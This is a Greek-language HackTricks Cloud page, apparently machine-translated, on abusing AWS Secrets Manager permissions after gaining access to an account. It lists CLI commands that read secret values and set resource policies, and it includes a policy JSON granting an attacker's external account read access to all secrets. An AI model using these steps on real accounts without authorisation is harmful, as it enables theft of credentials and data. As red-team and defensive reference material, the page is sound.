Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Για περισσότερες πληροφορίες σχετικά με τον μάνατζερ μυστικών, ελέγξτε:
{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} aws-secrets-manager-enum.md {% endcontent-ref %}
Ένας επιτιθέμενος με αυτήν την άδεια μπορεί να ανακτήσει την αποθηκευμένη τιμή μέσα σε ένα μυστικό στο AWS Μάνατζερ Μυστικών.
aws secretsmanager get-secret-value --secret-id <secret_name> # Get value
Πιθανές Επιπτώσεις: Πρόσβαση σε υψηλά ευαίσθητα δεδομένα μέσα στην υπηρεσία AWS Secrets Manager.
Με τα προηγούμενα δικαιώματα είναι δυνατόν να δοθεί πρόσβαση σε άλλους χρήστες/λογαριασμούς (ακόμα και εξωτερικούς) για να έχουν πρόσβαση στο μυστικό. Σημειώστε ότι για να διαβάσει μυστικά που έχουν κρυπτογραφηθεί με ένα κλειδί KMS, ο χρήστης πρέπει επίσης να έχει πρόσβαση στο κλειδί KMS (περισσότερες πληροφορίες στην σελίδα KMS Enum).
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json
policy.json:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowListSecrets",
"Effect": "Allow",
"Action": [
"secretsmanager:ListSecrets",
"secretsmanager:ListSecretVersionIds"
],
"Resource": "*"
},
{
"Sid": "AllowGetSecretValue",
"Effect": "Allow",
"Action": "secretsmanager:GetSecretValue",
"Resource": "arn:aws:secretsmanager:us-west-2:123456789012:secret:my-secret"
}
]
}
This policy.json
file contains the permissions defined for an AWS Secrets Manager user. The policy allows the user to perform the following actions:
secretsmanager:ListSecrets
andsecretsmanager:ListSecretVersionIds
: This allows the user to list all secrets and their version IDs.secretsmanager:GetSecretValue
: This allows the user to retrieve the value of a specific secret.
The Resource
field specifies the ARN (Amazon Resource Name) of the secret that the user is allowed to access. In this example, the ARN is arn:aws:secretsmanager:us-west-2:123456789012:secret:my-secret
.
By granting these permissions, the user can list secrets and retrieve the value of the specified secret.
{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}
Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.